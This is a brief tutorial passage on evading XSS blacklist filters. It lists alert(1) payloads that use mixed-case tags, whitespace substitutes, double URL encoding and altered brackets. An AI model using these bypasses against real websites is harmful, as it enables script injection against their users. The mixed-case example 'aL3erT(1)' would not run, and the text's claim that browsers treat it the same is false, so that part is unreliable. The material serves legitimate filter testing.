A good trick is to slightly modify the tag names used in the payload string, for example, for a black list it is not the same next lines:
<script>alert(1)</script> <ScrIPt>aL3erT(1)</ScrIPT>
Browsers will show the code in the same way, but for some filters this is not a malicious string.
Another trick is to modify the spaces with other characters, to avoid the filters, as here:
<img/onerror=alert(1) src=a> <img[%09]onerror=alert(1) src=a> <img[%0d]onerror=alert(1) src=a> <img[%0a]onerror=alert(1) src=a> <img/"onerror=alert(1) src=a> <img/'onerror=alert(1) src=a>
Another trick is to modify the brackets, using encoding techniques or just simply modifying them with accepted values:
%253cimg%20onerror=alert(1)%20src=a%253e «img onerror=alert(1) src=a» <<script>alert(1);//<</script> <script<{alert(1)}/></script>